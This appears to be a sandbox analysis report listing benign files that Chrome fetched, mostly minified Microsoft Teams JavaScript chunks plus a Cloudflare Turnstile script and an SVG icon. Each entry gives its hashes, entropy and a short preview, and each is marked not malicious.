                                                                                                                                                                                                                                                                            SHA1:EF9F49B8E410322B481793EA5C76AE9F5616E633
                                                                                                                                                                                                                                                                            SHA-256:36834979F247CB16C0A1FFE50C8BFA2C3462CABA6C2A0982C1E337BAEBF51150
                                                                                                                                                                                                                                                                            SHA-512:35835B7E937D286CA0F110D9A2C1E0ACA1E36ACCB4570B7D27AB5D8DC0A46C833AB0F701CB9A5102B7610AFD830818563DA9833B0A1DC47D47743961DD2D8A99
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/856736-f0c0a899b2cc1159.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[856736],{670262:(e,t,n)=>{n.d(t,{D:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppButtonQuery($appId:ID!) {appButtonResult(appId:$appId) @client {appId,action}}");return delete this.definitions,this.definitions=e.definitions}}},845857:(e,t,n)=>{n.d(t,{$:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppFocusEnterQuery($appId:ID!) {focusEnterHandlerState(appId:$appId) @client {appId,action}}");return delete this.definitions,this.definitions=e.definitions}}},298416:(e,t,n)=>{n.d(t,{A:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppFocusRegisterQuery($appId:ID!) {registerFocusEnterHandlerState(appId:$appId) @client {appId,isRegistered}}");return delete this.definitions,this.definitions=e.defini
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):103786
                                                                                                                                                                                                                                                                            Entropy (8bit):5.261490918744291
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:0zuTx2lhML9fXawZl4UEVErSgcAHP2dErROyG:7TCMFE6SgXOyG
                                                                                                                                                                                                                                                                            MD5:AF5B61E63EDF148383430A18381D2F9A
                                                                                                                                                                                                                                                                            SHA1:A6DD3EBC64F1D401A3E970EF8A13D2EEB5328987
                                                                                                                                                                                                                                                                            SHA-256:6CFDA19B61B4BB0AF261914AF54875287835A5EDD8D61E184FD8B229E7235907
                                                                                                                                                                                                                                                                            SHA-512:15B0DAE2836D51E707D7F62FE4AEAE5D2AF16D9A93316F1A7B3D0822ABCF4B27C1CC9B0A2C8B6355C3FFE05425638543DC253965216A56532C5746042D6EDB39
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[927767,317822,425104],{787762:(e,t,n)=>{"use strict";n.d(t,{I3:()=>ue,Em:()=>se,n_:()=>de,WY:()=>le,Nj:()=>ae,Rs:()=>ce});var r=n(845155),o=n.n(r),i=n(757060),s=n(213991),u=n(451281),a=n(513432),l=n(364819);function c(){const[e,t]=(0,a.useReducer)((e=>e+1),0);return t}var d=n(860775),f=class{constructor(e){this.onComplete=e,this.status=[!0,void 0]}isIdle(){return this.status[0]&&void 0===this.querySubscription}dispose(){var e;null==(e=this.querySubscription)||e.unsubscribe(),this.querySubscription=void 0}reset(){this.dispose(),this.status=[!0,void 0]}handleResult(e){this.status=[!1,e],this.dispose(),this.onComplete()}subscribe(e){this.querySubscription=e.subscribe((({error:e})=>{this.handleResult(e)}),(e=>{this.handleResult(e)}))}};function p(e,t){const{watchQueryDocument:n}=e;o()(n,"useLazyLoadQuery(): Expected a `watchQueryDocument` to have been extracted. Did you forget to invoke the c
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21232)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):21340
                                                                                                                                                                                                                                                                            Entropy (8bit):5.7585955980452805
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:oyw1NskKom67NmJoZm5U6DJOTkoAPru8uA0BvkrGgmTAKd0Dfs3w:loNI3hJOTrY0BvkrXmTAKdKfsw
                                                                                                                                                                                                                                                                            MD5:E98A29DDB910BFCFBCA3B6E6D5F1D386
                                                                                                                                                                                                                                                                            SHA1:FAD7F04C1FA5EED36A43313430962F07BECB13FE
                                                                                                                                                                                                                                                                            SHA-256:2F75B07E3C3ED925D2E97B334FD2BA0FE42C2B0291C3F9C1AA6AB6152AFC3296
                                                                                                                                                                                                                                                                            SHA-512:51BB8DC7A59F707E4239DA4F96313A7018BCDFF9B051EF30A7D0914DC3C7D8195F76A32F846FE492942638B8BF8480F1BD8AE37429045C6087B62F1AF37B39C7
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/795307-6e8551d9d7dca952.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[795307],{554186:(t,e,r)=>{var i=r(105117),n=r(94354),s=n;s.v1=i,s.v4=n,t.exports=s},997811:t=>{for(var e=[],r=0;r<256;++r)e[r]=(r+256).toString(16).substr(1);t.exports=function(t,r){var i=r||0,n=e;return[n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]]].join("")}},596778:t=>{var e="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(e){var r=new Uint8Array(16);t.exports=function(){return e(r),r}}else{var i=new Array(16);t.exports=function(){for(var t,e=0;e<16;e++)0==(3&e)&&(t=4294967296*Math.random()),i[e]=t>>>((3&e)<<3)&255;return i}}},105117:(t,e,r)=>{var i,n,s=r(596778),a=r(997811),o=0,I=0;t.exports=fun
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1432)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1540
                                                                                                                                                                                                                                                                            Entropy (8bit):5.000460293458999
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38vGvrwybSH4oxGsKsR/SUnH8PZvLOW4Tao8XhdqkrSO7yyjIzgYb0:wp3sp39vE1TgtSvyIzp0
                                                                                                                                                                                                                                                                            MD5:896D419D1C1A474F2985AE19A11E43AF
                                                                                                                                                                                                                                                                            SHA1:DCC73A06352D2FF9B1358082DEDFD3B905448063
                                                                                                                                                                                                                                                                            SHA-256:9F191C3167D50BFFD4CD6F68EB2D63B124E99C08AF7381069952BAC9E7C4A19C
                                                                                                                                                                                                                                                                            SHA-512:4A81C80710B63C81D6EDF35CD3B26B4C4B8C87D2F3C45C88D4ADB3CC6B0B8A26EB543219399CC6D1A949983AF55FC54AD1D687883ED9DFF1AA849F632FDF3A14
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[416397],{416397:(e,a,t)=>{t.d(a,{Z:()=>r});var C=t(513432),s=t(395225),l=t.n(s),c=t(485529),n=t(829289),r=(0,c.Ke)({svg:function(e){var a=e.classes;return C.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svg},C.createElement("path",{className:l()(n.Q.filled,a.filledPart),d:"M6.75 10C6.75 10.9665 5.9665 11.75 5 11.75C4.0335 11.75 3.25 10.9665 3.25 10C3.25 9.0335 4.0335 8.25 5 8.25C5.9665 8.25 6.75 9.0335 6.75 10ZM11.75 10C11.75 10.9665 10.9665 11.75 10 11.75C9.0335 11.75 8.25 10.9665 8.25 10C8.25 9.0335 9.0335 8.25 10 8.25C10.9665 8.25 11.75 9.0335 11.75 10ZM15 11.75C15.9665 11.75 16.75 10.9665 16.75 10C16.75 9.0335 15.9665 8.25 15 8.25C14.0335 8.25 13.25 9.0335 13.25 10C13.25 10.9665 14.0335 11.75 15 11.75Z"}),C.createElement("path",{className:l()(n.Q.outline,a.outlinePart),d:"M6.25 10C6.25 10.6904 5.69036 11.25 5 11.25C4.30964 11.2
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):465958
                                                                                                                                                                                                                                                                            Entropy (8bit):5.289643058349342
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:3/bEIaqlBDopzwmdMOLoKG5t3qmOoUsKbtypIQw79yE:jDaJpMVqZodIj78E
                                                                                                                                                                                                                                                                            MD5:DF4D043CC93552709C62AC2CAFAA7BFB
                                                                                                                                                                                                                                                                            SHA1:8AA0F88FF55600FB80081347F6BAB47D5B5A9FA8
                                                                                                                                                                                                                                                                            SHA-256:6F4071C208A6068541DA2369149E8722F3A3CF694C6D4FAB11E76DB58EE28430
                                                                                                                                                                                                                                                                            SHA-512:10D5EABB8D7F912126230F3BA769376EE841E7A24CCB4A2A21F613F293E17C249D565D0DAAC11675817076ED4A6A3CF028083890C03B7CE5675D379B2A4B9FF2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[998790],{248700:(e,t,r)=>{"use strict";r.d(t,{p:()=>n});var n=(e,{variables:t})=>t?void 0===t.__fragments?t:t.__fragments:null},406704:(e,t,r)=>{"use strict";r.d(t,{l:()=>o,h:()=>a});var n=r(845155),i=r.n(n),o=(e,t)=>{var r,n,o;const a=null==(r=t.args)?void 0:r.id;i()(a,"Expected an `id` argument");const s=(null==(o=null==(n=t.field)?void 0:n.selectionSet)?void 0:o.selections.filter((e=>"FragmentSpread"===e.kind))).map((e=>e.name.value));i()(1===s.length,"Expected a single fragment spread in the watch node query, instead got `%s`",s.length);const u=s[0],c=t.query.definitions.find((e=>"FragmentDefinition"===e.kind&&e.name.value===u));return i()(c,"Expected document to contain a fragment by name `%s`",u),t.toReference({__typename:c.typeCondition.name.value,id:a})},a=(e,t)=>{var r,n;const o=null==(n=null==(r=t.args)?void 0:r.id)?void 0:n.toString();return i()(o,"Expected an `id` argument"),t
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47694)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):47695
                                                                                                                                                                                                                                                                            Entropy (8bit):5.401531363850578
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:IXCtQmIutwVHbzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZU8nw81KZLGcD:IGJWHbzZBF6xbGfLsVvy33FU8DW
                                                                                                                                                                                                                                                                            MD5:1685878B80EECB073E51C13F17A5E530
                                                                                                                                                                                                                                                                            SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                                                                                                                                                                                                                                                                            SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                                                                                                                                                                                                                                                                            SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (27189)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):27297
                                                                                                                                                                                                                                                                            Entropy (8bit):5.278753153070589
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:4zEhQ+m4/T1f0FE0/9wQsry3HFpNKD2jdHm09St/d6ruizL2Gtg:oEhQruizLo
                                                                                                                                                                                                                                                                            MD5:15436DE719628897F3FBAD88E595CC26
                                                                                                                                                                                                                                                                            SHA1:804B683C22B89172D2FA55D5C0B6755E84C7A556
                                                                                                                                                                                                                                                                            SHA-256:4E79E6FD321A23D5FD6E7A4622B76C4C5CEFB39D797D45B165C0B5344694BEFC
                                                                                                                                                                                                                                                                            SHA-512:24E335A532B08A1D222DEB36B603BA4CD0F707082341A7BF0D0077497A5F3D1515C8779E6A758EA5E701DD50FD0F8086215E23B0885411B5579E9FD370D785A5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[387552],{28932:(e,t,n)=>{n.d(t,{x:()=>i});const i={0:"OngoingCall",OngoingCall:0,1:"Meeting",Meeting:1,2:"OneToOneCall",OneToOneCall:2,3:"GroupCall",GroupCall:3,4:"AgentMonitorSession",AgentMonitorSession:4}},588534:(e,t,n)=>{var i;n.d(t,{R:()=>i}),function(e){e.ReplyChain="ReplyChain",e.CallHistory="CallHistory",e.CallHistoryDoubleClick="CallHistoryDoubleClick",e.ContactsTab="ContactsTab",e.Dialpad="Dialpad",e.DialpadWithPeoplePicker="DialpadWithPeoplePicker",e.ExchangeContactsTab="ExchangeContactsTab",e.EchoBotCall="EchoBotCall",e.Voicemail="Voicemail",e.RetryCall="RetryCall",e.RejoinCall="RejoinCall",e.RetryCallFromChildWindow="RetryCallFromChildWindow",e.RejoinCallFromChildWindow="RejoinCallFromChildWindow",e.CallingAnonMeetingEndScreen="CallingAnonMeetingEndScreen",e.HIDTriggered="HIDTriggered",e.HIDTriggeredAccept="hidtriggered_accept",e.HIDTriggeredVoipAccept="hidtrigg
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1592
                                                                                                                                                                                                                                                                            Entropy (8bit):4.205005284721148
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                                                                                                                                                                                                                            MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                                                                                                                                                                                                            SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                                                                                                                                                                                                            SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                                                                                                                                                                                                            SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33642)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):33750
                                                                                                                                                                                                                                                                            Entropy (8bit):5.416241015305667
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:XdE4+HCBWnWmt9/YpXfOYhZZnSgmyJ7MqVfbHEgGVM/8eNyXa77itOpIaR7GR0I3:XwuZnSgm6g+TPn+a772OpIaR780C
                                                                                                                                                                                                                                                                            MD5:0CB7F362F3A5FCAFB4BFD1000831C40B
                                                                                                                                                                                                                                                                            SHA1:D2CEE4FED4A0BD9F7E7B8DA70AA6E4A667F94417
                                                                                                                                                                                                                                                                            SHA-256:6315D15FD3B316296BDD64F45115781665B5561ACD0427280267FE74AD318F4C
                                                                                                                                                                                                                                                                            SHA-512:069DDEDF7CEB723E335DAAC8A8E440C21B319CEC3C564BBD6DA3227A24FFE40F8E1624303E207A5D0FB6048969612A1DAB18A58BAD5D9559F8C1C63A3ED5E7FC
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[615291,838790,268800,173388,951007],{182227:(e,t,n)=>{n.d(t,{K:()=>r});var r=function(){return{attributes:{root:{role:"img","aria-hidden":"true"}}}}},678865:(e,t,n)=>{n.d(t,{s:()=>o});var r=n(953543),o=function(e){var t=a(e);return{attributes:{trigger:{"aria-describedby":t||e["aria-describedby"]},tooltip:{role:"tooltip",id:t,"aria-hidden":!e.open}},keyActions:{trigger:Object.assign({},e.open&&{close:{keyCombinations:[{keyCode:r.rC.Escape}]}})}}},a=function(e){if(!e["aria-describedby"])return e.contentId}},799224:(e,t,n)=>{n.d(t,{_:()=>f});var r=n(513432),o=n(644525),a=n(854130);var l=n(164093),s=n(250452);var i=n(965804),c=n(526521);const u="fui-Image",d=(0,i.O)({base:{g2u3we:"fj3muxo",h3c5rm:["f1akhkt","f1lxtadh"],B9xav0g:"f1aperda",zhjwy3:["f1lxtadh","f1akhkt"],Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f1fabniw",B7ck84d:"f1ewtqcl",mc9l5x:"f14t3ns0"},bordered:{icvyot:"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15885)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):15993
                                                                                                                                                                                                                                                                            Entropy (8bit):4.29920573326791
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:53Xt9Whl53CLeG9WIA9y64grsACP0Ne0Cd2M5Obdk3ILZV3umGVW1Q2xgkG/A8Pi:1Wongwdz4bdbZGyg9/A8PdVQp
                                                                                                                                                                                                                                                                            MD5:493B5F0960B7170BEB6C125CD858C739
                                                                                                                                                                                                                                                                            SHA1:6E7779C6F84A34FF98935C044BFF8F80F6EC5C3F
                                                                                                                                                                                                                                                                            SHA-256:F73BB0C05FF62010865EA0472C40B24A5B05F0C3880648AA30AE13B9E30C944E
                                                                                                                                                                                                                                                                            SHA-512:BE2A4BD0864CD4AB8DE13DDF7EFBA22577EAA0C48F9A116E8D5019A48B2EA686BB07E569E96118D502D19398BE513CED91029D4CE4965D9711C7ABD0EDDB1A71
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/620314-b5a1e9ee68e5952f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[620314],{620314:(a,l,c)=>{c.d(l,{Pf_:()=>Z,BHo:()=>e,VmI:()=>v,z0D:()=>m,Wro:()=>M,MKZ:()=>L,gBG:()=>i,g1i:()=>r,KPm:()=>t,Ugv:()=>A,oCp:()=>u,GLf:()=>V,p4c:()=>H,FF8:()=>U,UL4:()=>s,Oy3:()=>g,vqM:()=>T,r3T:()=>d,K53:()=>b,Cbs:()=>o,naJ:()=>R,Qj7:()=>n,KNH:()=>k,iV5:()=>C,GV$:()=>F,fbj:()=>x});var h=c(693935);const Z=(0,h.U)("TextNumberListLtr20Filled","20",["M5 1.5a.5.5 0 0 0-.39-.49.5.5 0 0 0-.56.27l-.07.12a2.96 2.96 0 0 1-1.2 1.15.5.5 0 1 0 .44.9c.3-.15.56-.34.78-.53V5.5a.5.5 0 0 0 1 0v-4ZM8.75 4a.75.75 0 1 0 0 1.5h7.5a.75.75 0 0 0 0-1.5h-7.5Zm0 5a.75.75 0 1 0 0 1.5h7.5a.75.75 0 0 0 0-1.5h-7.5ZM8 14.75c0-.41.34-.75.75-.75h7.5a.75.75 0 0 1 0 1.5h-7.5a.75.75 0 0 1-.75-.75Zm-5.35-7.1a.5.5 0 0 0 .7.7l.05-.04.2-.12C3.76 8.09 4 8 4.3 8c.23 0 .41.06.53.15.1.07.16.17.16.35a.5.5 0 0 1-.21.44c-.15.12-.35.22-.62.35l-.14.08c-.32.15-.7.36-1 .7-.33.35-.53.81-.53 1.43 0 .28.22.5.5.5h2.5a
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6565)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):6673
                                                                                                                                                                                                                                                                            Entropy (8bit):5.188554109702156
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:pFI31EXqP8+2Oj31wvm3YEZUVaIBlPC9aNMM1vbLIAVJeeQ2wz0cYW9a198:pYiXMwvUZCQaac1jwz0cM1u
                                                                                                                                                                                                                                                                            MD5:903DB9F502EF645D912B50F781960FFA
                                                                                                                                                                                                                                                                            SHA1:50C7B1E5533C892E5C5AC0A47485C0B5C158DE78
                                                                                                                                                                                                                                                                            SHA-256:28CD6C823E1FA6F9A6DADECD2ED9FCBD55EB1FFE831CE0A7B3952C6804B21B9C
                                                                                                                                                                                                                                                                            SHA-512:AF378F8600F59FFA1A5C70F6FC322416B555D506A9ABDC291EE443303B66C754A84754B4BB849D53EA36DE7B1762349C6C1CC7A2D01D2A4A4F173C54A885456E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/945208-20d36298097b5d53.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[945208],{478331:(e,t)=>{var r=Symbol.for("react.element"),n=Symbol.for("react.portal"),o=Symbol.for("react.fragment"),u=Symbol.for("react.strict_mode"),a=Symbol.for("react.profiler"),c=Symbol.for("react.provider"),i=Symbol.for("react.context"),f=Symbol.for("react.forward_ref"),s=Symbol.for("react.suspense"),l=Symbol.for("react.memo"),p=Symbol.for("react.lazy"),y=Symbol.iterator;var d={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},_=Object.assign,h={};function m(e,t,r){this.props=e,this.context=t,this.refs=h,this.updater=r||d}function b(){}function v(e,t,r){this.props=e,this.context=t,this.refs=h,this.updater=r||d}m.prototype.isReactComponent={},m.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error("setState(...): takes an object of state variables to u
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (19613)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):19721
                                                                                                                                                                                                                                                                            Entropy (8bit):5.343521820857181
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:i4A/8Siva3/i3RrXxLXY0SQw2XMaeZhrDPuTFi9u5yHfdUsYUnseOrQbDz:Dvi/inXBXMTZpURdS9z
                                                                                                                                                                                                                                                                            MD5:C86832ABA19643DA044A61F0121FC06A
                                                                                                                                                                                                                                                                            SHA1:A44017135CF79D42AAE4E617DD23EB82581DAEA2
                                                                                                                                                                                                                                                                            SHA-256:8835A3F9BF4B64E64A7A9ED20D3C9E5EF3B791C3C80776D644CDD63DE9AA4558
                                                                                                                                                                                                                                                                            SHA-512:67E319B01367F2924520272DF1C9A54EB6D483E6CF064561FE0E4B6C2C55779434C6D574C5B624EFF81D32BDC5A415759B8FE477E7605187145BEC38F747E941
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[914945],{593279:(e,n,t)=>{t.d(n,{i:()=>a});var r=t(888846),i=t(240364),o=t(504158),a=function(e){return{attributes:{root:{role:"menu"}},focusZone:{props:{isCircularNavigation:!0,shouldFocusInnerElementWhenReceivedFocus:!0,direction:e.vertical?r.E.vertical:r.E.horizontal}},childBehaviors:{item:i.b,divider:o.d}}}},504158:(e,n,t)=>{t.d(n,{d:()=>r});var r=function(){return{attributes:{root:{role:"presentation"}}}}},240364:(e,n,t)=>{t.d(n,{b:()=>o});var r=t(953543),i=t(504405),o=function(e){var n;return{attributes:{wrapper:{role:"presentation"},root:(n={role:"menuitem",tabIndex:0,"aria-expanded":e.hasMenu?e.menuOpen||!1:void 0,"aria-haspopup":e.hasMenu?"true":void 0,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"],"aria-disabled":e.disabled},n[i.P]=!0,n)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:r.rC.Ente
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):3886746
                                                                                                                                                                                                                                                                            Entropy (8bit):5.391995387658667
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:49152:bFEqeRKTEJpWXa2Pyr7WrZ9s4SwwP2BIoortbDhqzAVNHI/Jwjka+O4jdTtk18p9:oVs1
                                                                                                                                                                                                                                                                            MD5:28623544BBB4E5FC02CD8DAFE548322F
                                                                                                                                                                                                                                                                            SHA1:8C8EB4A60C427BD5D0F60BF5EA4AD485D78B773E
                                                                                                                                                                                                                                                                            SHA-256:89416D1F024D76DD96F7ECDE58541D0F0B8B9382EE8E435AD64B42E89DD10666
                                                                                                                                                                                                                                                                            SHA-512:FDB5EBDA54583DC84EB4A5B7F980AD28FDAAA83F60FC96107BD9ACA7C754493E353A5BAA3C8A62B5BB7A0BE81BC51F12DF33DFD868D6A3507B94DB12E5C3366F
                                                                                                                                                                                                                                                                            Malicious:false
